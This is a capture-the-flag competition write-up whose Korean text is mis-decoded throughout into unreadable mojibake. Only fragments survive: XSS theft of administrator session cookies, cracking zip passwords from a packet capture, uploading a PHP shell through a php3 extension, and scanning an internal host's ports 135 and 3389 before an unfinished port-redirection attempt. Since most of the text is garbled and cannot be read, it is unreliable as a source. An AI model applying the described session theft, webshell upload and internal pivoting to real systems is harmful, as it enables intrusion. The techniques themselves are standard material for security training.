°£´ÜÇÑ XSS¸¦ ÅëÇÏ¿© ¼¼¼Ç°ªÀ» ÈÉÃÄ¿À´Â ¹æ¹ýÀ¸·Î °¡´ÉÇÏ¿´Áö¸¸ »ó´çÈ÷ ¿À·£ ½Ã°£ÀÌ °É·È´ø ¹®Á¦·Î »ý°¢µË´Ï´Ù. XSS Ãë¾à¼ºÀ» ÀǵµÇÑ ¹®Á¦¶ó¸é ÀÚµ¿È­ ÀÛ¾÷À» ÇØ ³õ¾Æ¾ß Çϴµ¥ ±×·¸Áö ¸øÇÑ°ÍÀ¸·Î º¸¿´À¸¸ç °ü¸®ÀÚ ¼¼¼ÇÀ» ¹Þ±â°¡ »ó´çÈ÷ ¾î·Á¿ü½À´Ï´Ù. ±×¸®°í ÀÏ¹Ý »ç¿ëÀÚµµ ±ÛÀ» ÀÐÀ» ¼ö ÀÖ¾ú±â ¶§¹®¿¡ XSS¸¦ ÅëÇØ document.cookie °ªÀ» ÀúÀåÇØ ³õÀº ÆÄÀÏ¿¡´Â ¿©·¯ ¼¼¼ÇÀÌ µÚ¼¯¿© ÀÖ¾ú°í ¹®Á¦¿¡¼­ °ü¸®ÀÚ ¼¼¼ÇÀ» ÀÏ¹Ý »ç¿ëÀÚÀÇ ¼¼¼Ç°ú µ¿ÀÏÇÑ ÇüÅ·Π¸¸µé¾î ³õ¾Ò±â ¶§¹®¿¡ ±¸ºÐÀ» ÇÒ ¼ö°¡ ¾ø¾ú½À´Ï´Ù. ÀÏ¹Ý »ç¿ëÀÚ°¡ °Ô½Ã±ÛÀ» ÀÐÀ»¶§ Á¦ÇÑÀ» µÎ°Å³ª °ü¸®ÀÚ ¼¼¼Ç ÇüŸ¦ Á¶±Ý Ưº°ÇÏ°Ô ±¸¼ºÇØ µÎ¾ú´õ¶ó¸é ÇÏ´Â ¾Æ½¬¿òÀÌ ¸¹ÀÌ ³²¾Ò½À´Ï´Ù. ¾Æ¹«Æ°, °Ô½Ã±Û ¼öÁ¤ ½Ã XSS Äڵ带 ÇÊÅ͸µ ¾øÀÌ »ðÀÔÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡À» ÅëÇÏ¿© °ü¸®ÀÚ ¼¼¼ÇÀ» ¾òÀ» ¼ö ÀÖ¾úÀ¸¸ç ÇØ´ç ¼¼¼ÇÀ» ÅëÇØ °Ô½Ã±ÛÀ» ¿­¶÷ÇÏ¿© Æнº¿öµå¸¦ ȹµæÇÒ ¼ö ÀÖ¾ú½À´Ï´Ù. Part C - 3 ÆÐŶ ĸÃÄ ÆÄÀÏÀÎ aracode.pcap°¡ ÁÖ¾îÁ³½À´Ï´Ù. wireshark¸¦ ÅëÇØ »ìÆ캻 °á°ú FTP Åë½ÅÀÌ ÀÌ·ç¾î Áø°ÍÀ» º¼ ¼ö ÀÖ¾ú°í, µ¥ÀÌÅÍ°¡ ¿À°¡´Â °úÁ¤À» µû·Î ÆÄÀÏ·Î ÀúÀåÇÏ¿© Æнº¿öµå°¡ ÀúÀåµÈ ¾ÐÃà ÆÄÀÏ µÎ°³¸¦ ¸¸µé ¼ö ÀÖ¾ú½À´Ï´Ù. ÇÏÁö¸¸ ¾ÐÃà ÆÄÀÏ¿¡ Æнº¿öµå°¡ °É·ÁÀÖ¾ú±â ¶§¹®¿¡ À̸¦ Ç®¾î¾ß Çߴµ¥, ´Ü¼øÇÑ ¹«Â÷º° ´ëÀÔ °ø°ÝÀ¸·Î´Â ¾Ë¾Æ³¾ ¼ö ¾ø¾ú½À´Ï´Ù. ±×·¡¼­ Advanced ZIP Password Recovery¶ó´Â ÅøÀ» ÀÌ¿ëÇÏ¿© »çÀü ÆÄÀÏÀ» ÀÌ¿ëÇÑ ¹«Â÷º° ´ëÀÔÀ¸·Î ¾ÐÃà ÆÄÀÏÀÇ Æнº¿öµå¸¦ ¾ò¾î³Â½À´Ï´Ù. ¾ÐÃàÀ» Ç®¸é ÅؽºÆ® ÆÄÀÏ Çϳª¿Í ±×¸² ÆÄÀÏ Çϳª°¡ Á¸ÀçÇϴµ¥, ÅؽºÆ® ÆÄÀÏ¿¡ ÀûÈù ¼ýÀÚ¸¦ ±×¸² ÆÄÀÏ¿¡¼­ º¸¿©ÁÖ´Â ¾Æ½ºÅ° ÄÚµåÇ¥¿¡ ´ëÀÀÇÏ¿© ¹®ÀÚ¸¦ ÃßÃâÇØ ³»¸é "woongkang" À̶ó´Â Æнº¿öµå¸¦ ¾òÀ» ¼ö ÀÖ½À´Ï´Ù. Part C - 4 ¹®Á¦¸¦ À§ÇØ Á¦ÀÛµÈ »çÀÌÆ®°¡ ÁÖ¾îÁ³½À´Ï´Ù. °Ô½ÃÆÇÀÇ ÆÄÀÏ ¾÷·Îµå Ãë¾à¼ºÀ» ÀÌ¿ëÇÏ¿© php3 µîÀÇ È®ÀåÀÚ·Î php ÆÄÀÏÀ» ¾÷·Îµå ÇÑ µÚ, ¾÷·Îµå µð·ºÅ丮¸¦ À¯ÃßÇؼ­ ½© ±ÇÇÑÀ» ȹµæÇÒ ¼ö ÀÖ½À´Ï´Ù. Ãß°¡ÀûÀ¸·Î °Ô½ÃÆÇÀÇ db Á¤º¸°¡ ´ã±ä ÆÄÀÏÀ» ÀÐÀ¸¹Ç·Î ÀÎÇØ sql Á¤º¸ ±îÁö ¸ðµÎ ¿­¶÷ÀÌ °¡´ÉÇÏ¿´½À´Ï´Ù. ÇÏÁö¸¸ ¼­¹ö ³»ÀÇ Á¤º¸¸¦ ¾Æ¹«¸® µÚÁ®µµ ·¹º§ Æнº¿öµå¿Í °ü·ÃµÈ µ¥ÀÌÅ͸¦ ãÀ» ¼ö ¾ø¾î¼­ ³»ºÎ ¼­¹ö¿¡ Ãë¾àÁ¡ÀÌ ÀÖ´Â °ÍÀ¸·Î ÆÇ´ÜÇÏ¿´½À´Ï´Ù. ifconfig ¸í·ÉÀ» ÀÌ¿ëÇÏ¿© 192.168.200.10¶ó´Â ³»ºÎ ¼­¹ö¸¦ ãÀ» ¼ö ÀÖ¾úÁö¸¸ ¾î´ÀÁ¤µµ »ìÆ캻 °á°ú ÇöÀç ½©À» ȹµæÇÑ ¼­¹ö¿Í µ¿ÀÏÇÑ ¼­¹ö¶ó´Â°ÍÀ» ¾Ë ¼ö ÀÖ¾ú½À´Ï´Ù. ±×·¡¼­ ¿À·¡Àü¿¡ ¸¸µé¾î µÐ ipscan ±â´ÉÀÌ Æ÷ÇÔµÈ ½ºÄ³³Ê¸¦ ÀÌ¿ëÇÏ¿© ³»ºÎ ¼­¹ö¸¦ Á¶»çÇÏ¿´À¸¸ç 192.168.200.11 ¶ó´Â ¼­¹ö°¡ Á¸ÀçÇÑ´Ù´Â °ÍÀ» ¾Ë¾Æ³¾ ¼ö ÀÖ¾ú½À´Ï´Ù. ´ÙÀ½Àº Æ÷Æ® ½ºÄµ °á°úÀÔ´Ï´Ù. -- hkscan -> portscan -> 192.168.200.11 loc-srv [135] NoName [3389] -- WindowsÀÇ RPC ¼­ºñ½º·Î ÃßÃøµÇ´Â 135 Æ÷Æ®¿Í, ¿ø°Ý Á¦¾î¸¦ À§ÇÑ Æ÷Æ®·Î ÃßÃøµÇ´Â 3389 Æ÷Æ®°¡ ¿­·ÁÀÖ´Â °ÍÀ» È®ÀÎÇÏ¿´½À´Ï´Ù. Æ÷Æ® Æ÷¿öµùÀ» »ý°¢ÇÏ¿´Áö¸¸ ´Ù¸¥ ¹®Á¦ Ç®À̶§¹®¿¡ ³ªÁßÀ¸·Î ¹Ì·ç¾ú°í, ÀÌÈÄ¿¡ Æ÷Æ® ¸®´ÙÀÌ·º¼Ç(»ý°¢Çß´ø°Í°ú °°Àº Àǵµ)À̶ó´Â ÈùÆ®°¡ Á¦°øµÇ¾ú½À´Ï´Ù. ¸¶Áö¸· 1½Ã°£À» ³²°ÜµÎ°í »ç¿ëÀÚ °èÁ¤¿¡¼­ Æ÷Æ® ¸®´ÙÀÌ·º¼ÇÀ» ¼öÇàÇÏ´Â ÅøÀ» ã´Ù°¡ ½ÇÆÐÇÏ¿© ssh ÅͳθµÀ» ½ÃµµÇÏ´Â µµÁß¿¡ ´ëȸ°¡ ³¡³µ½À´Ï´Ù.